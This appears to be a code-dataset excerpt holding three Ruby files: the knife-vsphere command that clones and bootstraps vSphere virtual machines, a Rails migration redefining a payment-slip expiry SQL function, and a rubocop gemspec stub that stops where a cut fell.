79bbef9fa5612b019ad5fafd3de3ca8991986b9a | 30,394 | # Author:: Ezra Pagel (<[email protected]>)
# Contributor:: Jesse Campbell (<[email protected]>)
# Contributor:: Bethany Erskine (<[email protected]>)
# Contributor:: Adrian Stanila (https://github.com/sacx)
# Contributor:: Ryan Hass ([email protected])
# License:: Apache License, Version 2.0
#
require "chef/knife"
require "chef/knife/base_vsphere_command"
require "chef/knife/customization_helper"
require "chef/knife/search_helper"
require "ipaddr"
require "netaddr"
require "securerandom"
# VsphereVmClone extends the BaseVspherecommand
class Chef::Knife::VsphereVmClone < Chef::Knife::BaseVsphereCommand
banner "knife vsphere vm clone VMNAME (options)"
# A AUTO_MAC for NIC?
AUTO_MAC ||= "auto".freeze
# A NO IP for you to use!
NO_IPS ||= "".freeze
# a linklayer origin is an actual nic
ORIGIN_IS_REAL_NIC ||= "linklayer".freeze
# include Chef::Knife::WinrmBase
include CustomizationHelper
include SearchHelper
deps do
require "chef/json_compat"
Chef::Knife::Bootstrap.load_deps
end
common_options
option :dest_folder,
long: "--dest-folder FOLDER",
description: "The folder into which to put the cloned VM"
option :datastore,
long: "--datastore STORE",
description: "The datastore into which to put the cloned VM"
option :datastorecluster,
long: "--datastorecluster STORE",
description: "The datastorecluster into which to put the cloned VM"
option :host,
long: "--host HOST",
description: "The host into which to put the cloned VM"
option :resource_pool,
long: "--resource-pool POOL",
description: "The resource pool or cluster into which to put the cloned VM"
option :source_vm,
long: "--template TEMPLATE",
description: "The source VM / Template to clone from"
option :linked_clone,
long: "--linked-clone",
description: "Indicates whether to use linked clones.",
boolean: false
option :thin_provision,
long: "--thin-provision",
description: "Indicates whether disk should be thin provisioned.",
boolean: true
option :annotation,
long: "--annotation TEXT",
description: "Add TEXT in Notes field from annotation"
option :customization_spec,
long: "--cspec CUST_SPEC",
description: "The name of any customization specification to apply"
option :customization_plugin,
long: "--cplugin CUST_PLUGIN_PATH",
description: "Path to plugin that implements KnifeVspherePlugin.customize_clone_spec and/or KnifeVspherePlugin.reconfig_vm"
option :customization_plugin_data,
long: "--cplugin-data CUST_PLUGIN_DATA",
description: "String of data to pass to the plugin. Use any format you wish."
option :customization_vlan,
long: "--cvlan CUST_VLANS",
description: "Comma-delimited list of VLAN names for network adapters to join"
option :customization_sw_uuid,
long: "--sw-uuid SWITCH_UUIDS",
description: "Comma-delimited list of distributed virtual switch UUIDs for network adapter to connect, use 'auto' to automatically assign"
option :customization_macs,
long: "--cmacs CUST_MACS",
description: "Comma-delimited list of MAC addresses for network adapters",
default: AUTO_MAC
option :customization_ips,
long: "--cips CUST_IPS",
description: "Comma-delimited list of CIDR IPs for customization",
default: NO_IPS
option :customization_dns_ips,
long: "--cdnsips CUST_DNS_IPS",
description: "Comma-delimited list of DNS IP addresses"
option :customization_dns_suffixes,
long: "--cdnssuffix CUST_DNS_SUFFIXES",
description: "Comma-delimited list of DNS search suffixes"
option :customization_gw,
long: "--cgw CUST_GW",
description: "CIDR IP of gateway for customization"
option :customization_hostname,
long: "--chostname CUST_HOSTNAME",
description: "Unqualified hostname for customization"
option :customization_domain,
long: "--cdomain CUST_DOMAIN",
description: "Domain name for customization"
option :customization_tz,
long: "--ctz CUST_TIMEZONE",
description: "Timezone invalid 'Area/Location' format"
option :customization_cpucount,
long: "--ccpu CUST_CPU_COUNT",
description: "Number of CPUs"
option :customization_corespersocket,
long: "--ccorespersocket CUST_CPU_CORES_PER_SOCKET",
description: "Number of CPU Cores per Socket"
option :customization_memory,
long: "--cram CUST_MEMORY_GB",
description: "Gigabytes of RAM"
option :customization_memory_reservation,
long: "--cram_reservation CUST_MEMORY_RESERVATION_GB",
description: "Gigabytes of RAM"
option :power,
long: "--start",
description: "Indicates whether to start the VM after a successful clone",
boolean: false
option :bootstrap,
long: "--bootstrap",
description: "Indicates whether to bootstrap the VM",
boolean: false
option :environment,
long: "--environment ENVIRONMENT",
description: "Environment to add the node to for bootstrapping"
option :fqdn,
long: "--fqdn SERVER_FQDN",
description: "Fully qualified hostname for bootstrapping"
option :bootstrap_msi_url,
long: "--bootstrap-msi-url URL",
description: "Location of the Chef Client MSI. The default templates will prefer to download from this location."
option :bootstrap_protocol,
long: "--bootstrap-protocol protocol",
description: "Protocol to bootstrap windows servers. options: winrm/ssh",
proc: proc { |key| Chef::Config[:knife][:bootstrap_protocol] = key },
default: nil
option :disable_customization,
long: "--disable-customization",
description: "Disable default customization",
boolean: true,
default: false
option :log_level,
short: "-l LEVEL",
long: "--log_level",
description: "Set the log level (debug, info, warn, error, fatal) for chef-client",
proc: ->(l) { l.to_sym }
option :mark_as_template,
long: "--mark_as_template",
description: "Indicates whether to mark the new vm as a template",
boolean: false
option :random_vmname,
long: "--random-vmname",
description: "Creates a random VMNAME starts with vm-XXXXXXXX",
boolean: false
option :random_vmname_prefix,
long: "--random-vmname-prefix PREFIX",
description: "Change the VMNAME prefix",
default: "vm-"
option :sysprep_timeout,
long: "--sysprep_timeout TIMEOUT",
description: "Wait TIMEOUT seconds for sysprep event before continuing with bootstrap",
default: 600
option :bootstrap_nic,
long: "--bootstrap-nic INTEGER",
description: "Network interface to use when multiple NICs are defined on a template.",
default: 0
option :bootstrap_ipv4,
long: "--bootstrap-ipv4",
description: "Force using an IPv4 address when a NIC has both IPv4 and IPv6 addresses.",
default: false
def run
check_license
plugin_setup!
validate_name_args!
validate_protocol!
validate_first_boot_attributes!
validate_winrm_transport_opts!
validate_policy_options!
plugin_validate_options!
winrm_warn_no_ssl_verification
warn_on_short_session_timeout
plugin_create_instance!
return unless get_config(:bootstrap)
$stdout.sync = true
connect!
register_client
content = render_template
bootstrap_path = upload_bootstrap(content)
perform_bootstrap(bootstrap_path)
plugin_finalize
ensure
connection.del_file!(bootstrap_path) if connection && bootstrap_path
end
# @return [TrueClass] If options are valid or exits
def plugin_validate_options!
unless using_supplied_hostname? ^ using_random_hostname?
show_usage
fatal_exit("You must specify a virtual machine name OR use --random-vmname")
end
abort "--template or knife[:source_vm] must be specified" unless config[:source_vm]
if get_config(:datastore) && get_config(:datastorecluster)
abort "Please select either datastore or datastorecluster"
end
if get_config(:customization_macs) != AUTO_MAC && get_config(:customization_ips) == NO_IPS
abort('Must specify IP numbers with --cips when specifying MAC addresses with --cmacs, can use "dhcp" as placeholder')
end
end
attr_accessor :server_name
alias host_descriptor server_name
# Create the server that we will bootstrap, if necessary
#
# Plugins that subclass bootstrap, e.g. knife-ec2, can use this method to call out to an API to build an instance of the server we wish to bootstrap
#
# @return [TrueClass] If instance successfully created, or exits
def plugin_create_instance!
config[:chef_node_name] = vmname unless get_config(:chef_node_name)
vim = vim_connection
vim.serviceContent.virtualDiskManager
dc = datacenter
src_vm = get_vm_by_name(get_config(:source_vm), get_config(:folder)) || fatal_exit("Could not find template #{get_config(:source_vm)}")
create_delta_disk(src_vm) if get_config(:linked_clone)
clone_spec = generate_clone_spec(src_vm.config)
cust_folder = config[:dest_folder] || get_config(:folder)
dest_folder = cust_folder.nil? ? src_vm.vmFolder : find_folder(cust_folder)
task = src_vm.CloneVM_Task(folder: dest_folder, name: vmname, spec: clone_spec)
puts "Cloning template #{get_config(:source_vm)} to new VM #{vmname}"
pp clone_spec if log_verbose?
begin
task.wait_for_completion
rescue RbVmomi::Fault => e
fault = e.fault
if fault.class == RbVmomi::VIM::NicSettingMismatch
abort "There is a mismatch in the number of NICs on the template (#{fault.numberOfNicsInVM}) and what you've passed on the command line with --cips (#{fault.numberOfNicsInSpec}). The VM has been cloned but not customized."
elsif fault.class == RbVmomi::VIM::DuplicateName
ui.info "VM already exists, proceeding to bootstrap"
else
raise e
end
end
puts "Finished creating virtual machine #{vmname}"
if customization_plugin && customization_plugin.respond_to?(:reconfig_vm)
target_vm = find_in_folder(dest_folder, RbVmomi::VIM::VirtualMachine, vmname) || abort("VM could not be found in #{dest_folder}")
customization_plugin.reconfig_vm(target_vm)
end
return if get_config(:mark_as_template)
if get_config(:power) || get_config(:bootstrap)
vm = get_vm_by_name(vmname, cust_folder) || fatal_exit("VM #{vmname} not found")
begin
vm.PowerOnVM_Task.wait_for_completion
rescue RbVmomi::Fault => e
raise e unless e.fault.class == RbVmomi::VIM::InvalidPowerState # Ignore if it's already turned on
end
puts "Powered on virtual machine #{vmname}"
end
return unless get_config(:bootstrap)
protocol = get_config(:bootstrap_protocol)
if windows?(src_vm.config)
protocol ||= "winrm"
connect_port ||= 5985
unless config[:disable_customization]
# Wait for customization to complete
puts "Waiting for customization to complete..."
CustomizationHelper.wait_for_sysprep(vm, vim, Integer(get_config(:sysprep_timeout)), 10)
puts "Customization Complete"
end
connect_host = guest_address(vm)
self.server_name = connect_host
Chef::Log.debug("Connect Host for winrm Bootstrap: #{connect_host}")
wait_for_access(connect_host, connect_port, protocol)
else
connect_host = guest_address(vm)
self.server_name = connect_host
connect_port ||= 22
Chef::Log.debug("Connect Host for SSH Bootstrap: #{connect_host}")
protocol ||= "ssh"
wait_for_access(connect_host, connect_port, protocol)
end
end
# Perform any setup necessary by the plugin
#
# Plugins that subclass bootstrap, e.g. knife-ec2, can use this method to create connection objects
#
# @return [TrueClass] If instance successfully created, or exits
def plugin_setup!; end
# Perform any teardown or cleanup necessary by the plugin
#
# Plugins that subclass bootstrap, e.g. knife-ec2, can use this method to display a message or perform any cleanup
#
# @return [void]
def plugin_finalize; end
def validate_name_args!; end
def ipv4_address(vm)
puts "Waiting for a valid IPv4 address..."
# Multiple reboots occur during guest customization in which a link-local
# address is assigned. As such, we need to wait until a routable IP address
# becomes available. This is most commonly an issue with Windows instances.
sleep 2 while vm_is_waiting_for_ip?(vm)
vm.guest.net[bootstrap_nic_index].ipAddress.detect { |addr| IPAddr.new(addr).ipv4? }
end
def vm_is_waiting_for_ip?(vm)
first_ip_address = vm.guest.net[bootstrap_nic_index].ipConfig.ipAddress.detect { |addr| IPAddr.new(addr.ipAddress).ipv4? }
first_ip_address.nil? || first_ip_address.origin == ORIGIN_IS_REAL_NIC
end
def guest_address(vm)
puts "Waiting for network interfaces to become available..."
sleep 2 while vm.guest.net.empty? || !vm.guest.ipAddress
ui.info "Found address #{vm.guest.ipAddress}" if log_verbose?
config[:fqdn] = if config[:bootstrap_ipv4]
ipv4_address(vm)
elsif config[:fqdn]
get_config(:fqdn)
else
# Use the first IP which is not a link-local address.
# This is the closest thing to vm.guest.ipAddress but
# allows specifying a NIC.
vm.guest.net[bootstrap_nic_index].ipConfig.ipAddress.detect do |addr|
addr.origin != "linklayer"
end.ipAddress
end
end
def wait_for_access(connect_host, connect_port, protocol)
if winrm?
if get_config(:winrm_ssl) && get_config(:connection_port) == "5985"
config[:connection_port] = "5986"
end
connect_port = get_config(:connection_port)
print "\n#{ui.color("Waiting for winrm access to become available on #{connect_host}:#{connect_port}", :magenta)}"
print(".") until tcp_test_winrm(connect_host, connect_port) do
sleep 10
puts("done")
end
else
print "\n#{ui.color("Waiting for sshd access to become available on #{connect_host}:#{connect_port}", :magenta)}"
print(".") until tcp_test_ssh(connect_host, connect_port) do
sleep 10
puts("done")
end
end
connect_port
end
# Rewrites each base disk of the source VM as a delta disk backed by the
# original file, so subsequent clones can share the parent backing
# (linked-clone style). Each disk is removed and re-added with a new backing
# whose parent points at the old one.
def create_delta_disk(src_vm)
disks = src_vm.config.hardware.device.grep(RbVmomi::VIM::VirtualDisk)
# Only disks without a parent backing, i.e. not already delta disks.
disks.select { |disk| disk.backing.parent.nil? }.each do |disk|
spec = {
deviceChange: [
{
operation: :remove,
device: disk,
},
{
operation: :add,
fileOperation: :create,
device: disk.dup.tap do |new_disk|
new_disk.backing = new_disk.backing.dup
# Empty file name within the datastore lets vSphere pick one.
new_disk.backing.fileName = "[#{disk.backing.datastore.name}]"
new_disk.backing.parent = disk.backing
end,
},
],
}
src_vm.ReconfigVM_Task(spec: spec).wait_for_completion
end
end
# ComputeResources eligible for VM placement: excludes resources whose hosts
# are all in maintenance mode, then (when the corresponding CLI option is
# set) filters by requested datastore, datastore cluster and network(s).
# Exits via fatal_exit as soon as a filter leaves nothing usable.
def find_available_hosts
hosts = traverse_folders_for_computeresources(datacenter.hostFolder)
fatal_exit("No ComputeResource found - Use --resource-pool to specify a resource pool or a cluster") if hosts.empty?
hosts.reject!(&:nil?)
hosts.reject! { |host| host.host.all? { |h| h.runtime.inMaintenanceMode } }
fatal_exit "All hosts in maintenance mode!" if hosts.empty?
if get_config(:datastore)
hosts.reject! { |host| !host.datastore.include?(find_datastore(get_config(:datastore))) }
end
fatal_exit "No hosts have the requested Datastore available! #{get_config(:datastore)}" if hosts.empty?
if get_config(:datastorecluster)
hosts.reject! { |host| !host.datastore.include?(find_datastorecluster(get_config(:datastorecluster))) }
end
fatal_exit "No hosts have the requested DatastoreCluster available! #{get_config(:datastorecluster)}" if hosts.empty?
if get_config(:customization_vlan)
vlan_list = get_config(:customization_vlan).split(",")
vlan_list.each do |network|
hosts.reject! { |host| !host.network.include?(find_network(network)) }
end
end
fatal_exit "No hosts have the requested Network available! #{get_config(:customization_vlan)}" if hosts.empty?
hosts
end
# Returns every host in the datacenter as a flat array, expanding cluster
# ComputeResources into their member hosts and keeping standalone
# ComputeResources as-is.
def all_the_hosts
  compute_resources = traverse_folders_for_computeresources(datacenter.hostFolder)
  compute_resources.flat_map do |resource|
    if resource.is_a? RbVmomi::VIM::ClusterComputeResource
      resource.host
    else
      resource
    end
  end
end
# Looks up a host by name.
#
# @param host_name [String] host name as reported by vCenter
# @return the matching host object
# @raise [RuntimeError] listing all known host names when no match exists
def find_host(host_name)
  # Traverse the host folder once and reuse the result for both the lookup
  # and the error message (previously all_the_hosts was computed twice, and
  # the block parameter shadowed the local `host`).
  hosts = all_the_hosts
  host = hosts.find { |candidate| candidate.name == host_name }
  raise "Can't find #{host_name}. I found #{hosts.map(&:name)}" unless host
  host
end
# Builds a CloneSpec
# Assembles the full RbVmomi VirtualMachineCloneSpec for the clone:
# placement (host / resource pool / datastore), hardware tweaks (CPU,
# memory, NIC backing/MACs) and the guest customization spec (identity and
# IP settings) derived from the CLI options.
#
# @param src_config [RbVmomi::VIM::VirtualMachineConfigInfo] source VM config
# @return [RbVmomi::VIM::VirtualMachineCloneSpec]
def generate_clone_spec(src_config)
rspec = RbVmomi::VIM.VirtualMachineRelocateSpec
# Placement: explicit host, explicit resource pool, or first available host.
case
when get_config(:host)
rspec.host = find_host(get_config(:host))
hosts = find_available_hosts
rspec.pool = hosts.first.resourcePool
when get_config(:resource_pool)
rspec.pool = find_pool(get_config(:resource_pool))
else
hosts = find_available_hosts
rspec.pool = hosts.first.resourcePool
end
rspec.diskMoveType = :moveChildMostDiskBacking if get_config(:linked_clone)
if get_config(:datastore)
rspec.datastore = find_datastore(get_config(:datastore))
end
# With a datastore cluster, pick the member store with the most free space.
if get_config(:datastorecluster)
dsc = find_datastorecluster(get_config(:datastorecluster))
dsc.childEntity.each do |store|
if rspec.datastore.nil? || rspec.datastore.summary[:freeSpace] < store.summary[:freeSpace]
rspec.datastore = store
end
end
end
rspec.transform = :sparse if get_config(:thin_provision)
is_template = !get_config(:mark_as_template).nil?
clone_spec = RbVmomi::VIM.VirtualMachineCloneSpec(location: rspec, powerOn: false, template: is_template)
clone_spec.config = RbVmomi::VIM.VirtualMachineConfigSpec(deviceChange: [])
if get_config(:annotation)
clone_spec.config.annotation = get_config(:annotation)
end
if get_config(:customization_cpucount)
clone_spec.config.numCPUs = get_config(:customization_cpucount)
end
if get_config(:customization_corespersocket)
clone_spec.config.numCoresPerSocket = get_config(:customization_corespersocket)
end
if get_config(:customization_memory)
clone_spec.config.memoryMB = Integer(get_config(:customization_memory)) * 1024
end
if get_config(:customization_memory_reservation)
clone_spec.config.memoryAllocation = RbVmomi::VIM.ResourceAllocationInfo reservation: Integer(Float(get_config(:customization_memory_reservation)) * 1024)
end
# One MAC per requested IP; AUTO_MAC means "let vSphere choose".
mac_list = if get_config(:customization_macs) == AUTO_MAC
[AUTO_MAC] * get_config(:customization_ips).split(",").length
else
get_config(:customization_macs).split(",")
end
if get_config(:customization_sw_uuid)
unless get_config(:customization_vlan)
abort("Must specify VLANs with --cvlan when specifying switch UUIDs with --sw-uuids")
end
# Normalize user-supplied switch UUIDs into vSphere's hyphenated format.
swuuid_list = if get_config(:customization_sw_uuid) == "auto"
["auto"] * get_config(:customization_ips).split(",").length
else
get_config(:customization_sw_uuid).split(",").map { |swuuid| swuuid.gsub(/((\w+\s+){7})(\w+)\s+(.+)/, '\1\3-\4') }
end
end
# Re-point each source NIC at the requested VLAN/portgroup.
if get_config(:customization_vlan)
vlan_list = get_config(:customization_vlan).split(",")
sw_uuid = get_config(:customization_sw_uuid)
networks = vlan_list.map { |vlan| find_network(vlan, sw_uuid) }
cards = src_config.hardware.device.grep(RbVmomi::VIM::VirtualEthernetCard)
networks.each_with_index do |network, index|
card = cards[index] || abort("Can't find source network card to customize for vlan #{vlan_list[index]}")
begin
if get_config(:customization_sw_uuid) && (swuuid_list[index] != "auto")
switch_port = RbVmomi::VIM.DistributedVirtualSwitchPortConnection(
switchUuid: swuuid_list[index], portgroupKey: network.key
)
else
switch_port = RbVmomi::VIM.DistributedVirtualSwitchPortConnection(
switchUuid: network.config.distributedVirtualSwitch.uuid, portgroupKey: network.key
)
end
card.backing.port = switch_port
rescue
# not connected to a distibuted switch?
card.backing = RbVmomi::VIM::VirtualEthernetCardNetworkBackingInfo(network: network, deviceName: network.name)
end
card.macAddress = mac_list[index] if get_config(:customization_macs) && mac_list[index] != AUTO_MAC
dev_spec = RbVmomi::VIM.VirtualDeviceConfigSpec(device: card, operation: "edit")
clone_spec.config.deviceChange.push dev_spec
end
end
# Start from a named --cspec, or an empty customization spec.
cust_spec = if get_config(:customization_spec)
csi = find_customization(get_config(:customization_spec)) ||
fatal_exit("failed to find customization specification named #{get_config(:customization_spec)}")
csi.spec
else
global_ipset = RbVmomi::VIM.CustomizationGlobalIPSettings
identity_settings = RbVmomi::VIM.CustomizationIdentitySettings
RbVmomi::VIM.CustomizationSpec(globalIPSettings: global_ipset, identity: identity_settings)
end
# --disable-customization: keep a named --cspec verbatim, otherwise none.
if get_config(:disable_customization)
clone_spec.customization = get_config(:customization_spec) ? cust_spec : nil
return clone_spec
end
if get_config(:customization_dns_ips)
cust_spec.globalIPSettings.dnsServerList = get_config(:customization_dns_ips).split(",")
end
if get_config(:customization_dns_suffixes)
cust_spec.globalIPSettings.dnsSuffixList = get_config(:customization_dns_suffixes).split(",")
end
if config[:customization_ips] != NO_IPS
cust_spec.nicSettingMap = config[:customization_ips].split(",").map.with_index { |cust_ip, index|
generate_adapter_map(cust_ip, get_config(:customization_gw), mac_list[index])
}
end
# TODO: why does the domain matter?
use_ident = config[:customization_hostname] || get_config(:customization_domain) || cust_spec.identity.props.empty?
# TODO: How could we not take this? Only if the identity were empty, but that's statically defined as empty above
if use_ident
hostname = config[:customization_hostname] || vmname
if windows?(src_config)
# We should get here with the customizations set, either by a plugin or a --cspec
fatal_exit "Windows clones need a customization identity. Try passing a --cspec or making a --cplugin" if cust_spec.identity.props.empty?
identification = identification_for_spec(cust_spec)
if cust_spec.identity.licenseFilePrintData
license_file_print_data = RbVmomi::VIM.CustomizationLicenseFilePrintData(
autoMode: cust_spec.identity.licenseFilePrintData.autoMode
)
end # optional param
user_data = RbVmomi::VIM.CustomizationUserData(
fullName: cust_spec.identity.userData.fullName,
orgName: cust_spec.identity.userData.orgName,
productId: cust_spec.identity.userData.productId,
computerName: RbVmomi::VIM.CustomizationFixedName(name: hostname)
)
gui_unattended = RbVmomi::VIM.CustomizationGuiUnattended(
autoLogon: cust_spec.identity.guiUnattended.autoLogon,
autoLogonCount: cust_spec.identity.guiUnattended.autoLogonCount,
password: RbVmomi::VIM.CustomizationPassword(
plainText: cust_spec.identity.guiUnattended.password.plainText,
value: cust_spec.identity.guiUnattended.password.value
),
timeZone: cust_spec.identity.guiUnattended.timeZone
)
# NOTE(review): this passes the literal string
# "cust_spec.identity.guiUnattended.commandList" rather than the value of
# that expression — looks like a bug; confirm intended runonce commands.
runonce = RbVmomi::VIM.CustomizationGuiRunOnce(
commandList: ["cust_spec.identity.guiUnattended.commandList"]
)
ident = RbVmomi::VIM.CustomizationSysprep
ident.guiRunOnce = runonce
ident.guiUnattended = gui_unattended
ident.identification = identification
ident.licenseFilePrintData = license_file_print_data
ident.userData = user_data
cust_spec.identity = ident
elsif linux?(src_config)
ident = RbVmomi::VIM.CustomizationLinuxPrep
ident.hostName = RbVmomi::VIM.CustomizationFixedName(name: hostname)
ident.domain = if get_config(:customization_domain)
get_config(:customization_domain)
else
""
end
cust_spec.identity = ident
else
ui.error("Customization only supports Linux and Windows currently.")
exit 1
end
end
clone_spec.customization = cust_spec
# Give a loaded customization plugin the final word on the spec.
if customization_plugin && customization_plugin.respond_to?(:customize_clone_spec)
clone_spec = customization_plugin.customize_clone_spec(src_config, clone_spec)
end
clone_spec
end
# Loads the customization plugin if one was specified
# @return [KnifeVspherePlugin] the loaded and initialized plugin or nil
# Memoized in @customization_plugin; on misconfiguration this aborts the
# whole process (Kernel#abort) rather than raising.
def customization_plugin
if @customization_plugin.nil?
cplugin_path = get_config(:customization_plugin)
if cplugin_path
if File.exist? cplugin_path
require cplugin_path
else
abort "Customization plugin could not be found at #{cplugin_path}"
end
# The plugin file is expected to define a top-level KnifeVspherePlugin class.
if Object.const_defined? "KnifeVspherePlugin"
@customization_plugin = Object.const_get("KnifeVspherePlugin").new
cplugin_data = get_config(:customization_plugin_data)
if cplugin_data
if @customization_plugin.respond_to?(:data=)
@customization_plugin.data = cplugin_data
else
abort "Customization plugin has no :data= accessor to receive the --cplugin-data argument. Define both or neither."
end
end
else
abort "KnifeVspherePlugin class is not defined in #{cplugin_path}"
end
end
end
@customization_plugin
end
# Retrieves a CustomizationSpecItem that matches the supplied name.
#
# @param name [String] name of the customization specification
# @return [RbVmomi::VIM::CustomizationSpecItem]
def find_customization(name)
  vim_connection
    .serviceContent
    .customizationSpecManager
    .GetCustomizationSpec(name: name)
end
# Generates a CustomizationAdapterMapping (currently only single IPv4 address) object
# @param ip [String] Any static IP address to use, or "dhcp" for DHCP
# @param gw [String] If static, the gateway for the interface, otherwise network address + 1 will be used
# @return [RbVmomi::VIM::CustomizationIPSettings]
# @param mac [String] optional MAC to pin on the adapter (skipped for AUTO_MAC)
def generate_adapter_map(ip = nil, gw = nil, mac = nil)
settings = RbVmomi::VIM.CustomizationIPSettings
if ip.nil? || ip.casecmp("dhcp") == 0
settings.ip = RbVmomi::VIM::CustomizationDhcpIpGenerator.new
else
# Static address: the value is expected in CIDR form (addr/prefix).
cidr_ip = NetAddr::CIDR.create(ip)
settings.ip = RbVmomi::VIM::CustomizationFixedIp(ipAddress: cidr_ip.ip)
settings.subnetMask = cidr_ip.netmask_ext
# TODO: want to confirm gw/ip are in same subnet?
# Only set gateway on first IP.
if config[:customization_ips].split(",").first == ip
if gw.nil?
# Default gateway: network address + 1.
settings.gateway = [cidr_ip.network(Objectify: true).next_ip]
else
gw_cidr = NetAddr::CIDR.create(gw)
settings.gateway = [gw_cidr.ip]
end
end
end
adapter_map = RbVmomi::VIM.CustomizationAdapterMapping
adapter_map.macAddress = mac if !mac.nil? && (mac != AUTO_MAC)
adapter_map.adapter = settings
adapter_map
end
# Probes hostname:connection_port for an SSH banner. On success the supplied
# block is invoked (callers use it to pause/log) and true is returned.
# Transient network errors log, optionally back off for 2s, and return false
# so the caller's polling loop can retry.
def tcp_test_ssh(hostname, connection_port)
tcp_socket = TCPSocket.new(hostname, connection_port)
# Wait up to 5s for sshd to send its banner before reading.
readable = IO.select([tcp_socket], nil, nil, 5)
if readable
ssh_banner = tcp_socket.gets
if ssh_banner.nil? || ssh_banner.empty?
false
else
Chef::Log.debug("sshd accepting connections on #{hostname}, banner is #{ssh_banner}")
yield
true
end
else
false
end
rescue SocketError, Errno::ECONNREFUSED, Errno::EHOSTUNREACH, Errno::ENETUNREACH, IOError
Chef::Log.debug("ssh failed to connect: #{hostname}")
sleep 2
false
rescue Errno::EPERM, Errno::ETIMEDOUT
Chef::Log.debug("ssh timed out: #{hostname}")
false
rescue Errno::ECONNRESET
Chef::Log.debug("ssh reset its connection: #{hostname}")
sleep 2
false
ensure
tcp_socket && tcp_socket.close
end
# Probes hostname:port with a plain TCP connect. On success the supplied
# block is invoked (callers use it to pause/log) and true is returned.
# Retryable network errors back off for 2 seconds before returning false;
# timeouts and permission errors return false immediately.
def tcp_test_winrm(hostname, port)
  socket = TCPSocket.new(hostname, port)
  yield
  true
rescue SocketError, Errno::ECONNREFUSED, Errno::EHOSTUNREACH, Errno::ENETUNREACH
  sleep 2
  false
rescue Errno::ETIMEDOUT, Errno::EPERM
  false
ensure
  # socket is nil when the connect itself raised.
  socket && socket.close
end
private
# VM name to create: the name supplied on the command line, or a generated
# random name when none was given.
def vmname
supplied_hostname || random_hostname
end
# True when a random VM name was requested (config[:random_vmname] set).
def using_random_hostname?
config[:random_vmname]
end
# True when the user passed a VM name as the first positional argument.
def using_supplied_hostname?
!supplied_hostname.nil?
end
# First positional CLI argument, used as the VM name (nil when absent).
def supplied_hostname
@name_args[0]
end
# Memoized random VM name: the configured prefix plus 8 hex characters.
def random_hostname
@random_hostname ||= config[:random_vmname_prefix] + SecureRandom.hex(4)
end
# Index (Integer) of the NIC used for bootstrapping; Integer() raises
# ArgumentError if the configured value is not a valid integer string.
def bootstrap_nic_index
Integer(get_config(:bootstrap_nic))
end
# If --cdomain matches what is in --cspec then use identification from the
# --cspec, else use --cdomain.
#
# Bug fix: the original used `when nil?`, which evaluates `self.nil?` (false)
# and therefore tests `false === domain` — so the "no domain given" branch
# could never match a nil domain. `when nil` is required.
#
# @param cust_spec [RbVmomi::VIM::CustomizationSpec] spec whose identification may be reused
# @return [RbVmomi::VIM::CustomizationIdentification]
def identification_for_spec(cust_spec)
  case domain = get_config(:customization_domain)
  when nil
    # Fall back to original behavior of using joinWorkgroup from the --cspec
    RbVmomi::VIM.CustomizationIdentification(
      joinWorkgroup: cust_spec.identity.identification.joinWorkgroup
    )
  when cust_spec.identity.identification.joinDomain
    # --cdomain equals the spec's joinDomain: reuse the spec's identification.
    cust_spec.identity.identification
  else
    RbVmomi::VIM.CustomizationIdentification(
      joinDomain: domain
    )
  end
end
end
| 35.056517 | 230 | 0.691551 |
4a45e395aad2af67cd3e29ec8115f4246a6fa07e | 728 | class FixSlipExpiresAt < ActiveRecord::Migration[4.2]
# Redefines slip_expires_at(payments) so a slip expires at the end of the
# final counted weekday: the weekday date + 1 day minus 1 second, computed
# in the application time zone.
def up
execute <<-SQL
CREATE OR REPLACE FUNCTION public.slip_expires_at(payments)
RETURNS timestamp without time zone
LANGUAGE sql
STABLE
AS $function$
SELECT weekdays_from(public.slip_expiration_weekdays(), public.zone_timestamp($1.created_at))::date + 1 - '1 second'::interval;
$function$
SQL
end
# Restores the previous definition, which returned the raw weekday
# timestamp without normalizing it to end-of-day.
def down
execute <<-SQL
CREATE OR REPLACE FUNCTION public.slip_expires_at(payments)
RETURNS timestamp without time zone
LANGUAGE sql
STABLE
AS $function$
SELECT weekdays_from(public.slip_expiration_weekdays(), public.zone_timestamp($1.created_at))
$function$
SQL
end
end
| 29.12 | 131 | 0.696429 |
628a87c2ef4f4dc8d59c56be0e14628b8984ef97 | 2,842 | # -*- encoding: utf-8 -*-
# stub: rubocop 1.1.0 ruby lib
# Gemspec stub for rubocop 1.1.0. The installed_by_version line indicates it
# was written by RubyGems at install time — prefer editing the gem's source
# gemspec rather than this file.
Gem::Specification.new do |s|
s.name = "rubocop".freeze
s.version = "1.1.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "bug_tracker_uri" => "https://github.com/rubocop-hq/rubocop/issues", "changelog_uri" => "https://github.com/rubocop-hq/rubocop/blob/master/CHANGELOG.md", "documentation_uri" => "https://docs.rubocop.org/rubocop/1.1/", "homepage_uri" => "https://rubocop.org/", "source_code_uri" => "https://github.com/rubocop-hq/rubocop/" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["Bozhidar Batsov".freeze, "Jonas Arvidsson".freeze, "Yuji Nakayama".freeze]
s.bindir = "exe".freeze
s.date = "2020-10-29"
s.description = " RuboCop is a Ruby code style checking and code formatting tool.\n It aims to enforce the community-driven Ruby Style Guide.\n".freeze
s.email = "[email protected]".freeze
s.executables = ["rubocop".freeze]
s.extra_rdoc_files = ["LICENSE.txt".freeze, "README.md".freeze]
s.files = ["LICENSE.txt".freeze, "README.md".freeze, "exe/rubocop".freeze]
s.homepage = "https://github.com/rubocop-hq/rubocop".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.4.0".freeze)
s.rubygems_version = "3.1.4".freeze
s.summary = "Automatic Ruby code style checking tool.".freeze
s.installed_by_version = "3.1.4" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
# Older RubyGems without add_runtime_dependency fall back to add_dependency.
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<parallel>.freeze, ["~> 1.10"])
s.add_runtime_dependency(%q<parser>.freeze, [">= 2.7.1.5"])
s.add_runtime_dependency(%q<rainbow>.freeze, [">= 2.2.2", "< 4.0"])
s.add_runtime_dependency(%q<regexp_parser>.freeze, [">= 1.8"])
s.add_runtime_dependency(%q<rexml>.freeze, [">= 0"])
s.add_runtime_dependency(%q<rubocop-ast>.freeze, [">= 1.0.1"])
s.add_runtime_dependency(%q<ruby-progressbar>.freeze, ["~> 1.7"])
s.add_runtime_dependency(%q<unicode-display_width>.freeze, [">= 1.4.0", "< 2.0"])
